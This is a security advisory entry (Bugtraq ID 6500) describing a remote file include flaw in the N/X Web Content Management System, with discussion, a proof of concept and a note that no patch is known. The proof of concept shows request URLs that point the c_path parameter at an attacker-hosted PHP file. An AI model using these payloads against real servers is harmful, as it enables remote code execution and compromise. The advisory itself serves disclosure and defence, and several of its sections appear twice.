N/X Web Content Management System Remote File Include Vulnerability
BID:6500
Info
N/X Web Content Management System Remote File Include Vulnerability
| Bugtraq ID: | 6500 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 02 2003 12:00AM |
| Updated: | Jan 02 2003 12:00AM |
| Credit: | Discovery is credited to Frog Man <[email protected]>. |
| Vulnerable: |
N/X N/X Web Content Management System 2002 Prerelease 1 |
| Not Vulnerable: | |
Discussion
N/X Web Content Management System Remote File Include Vulnerability
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
N/X Web Content Management System is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers.
An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host as a value for some parameters.
If the remote file is a PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the webserver. Successful exploitation may provide local access to the attacker.
Exploit / POC
N/X Web Content Management System Remote File Include Vulnerability
The following proof of concept was provided:
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with :
http://[attacker]/common/lib/launch.inc.php
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
The following proof of concept was provided:
http://[target]/nx/common/cds/menu.inc.php?c_path=http://[attacker]/
with :
http://[attacker]/common/lib/launch.inc.php
http://[target]/nx/common/dbo/datasets.php?c_path=http://[attacker]/
with :
http://[attacker]/common/dbo/saveset.php
http://[attacker]/common/dbo/recordset.php
http://[attacker]/common/dbo/deleteset.php
http://[attacker]/common/dbo/updateset.php
http://[attacker]/common/dbo/insertset.php
Solution / Fix
N/X Web Content Management System Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
N/X Web Content Management System Remote File Include Vulnerability
References:
References:
- N/X Web Content Management System Homepage (N/X)
- N/X (PHP) ("Frog Man"
)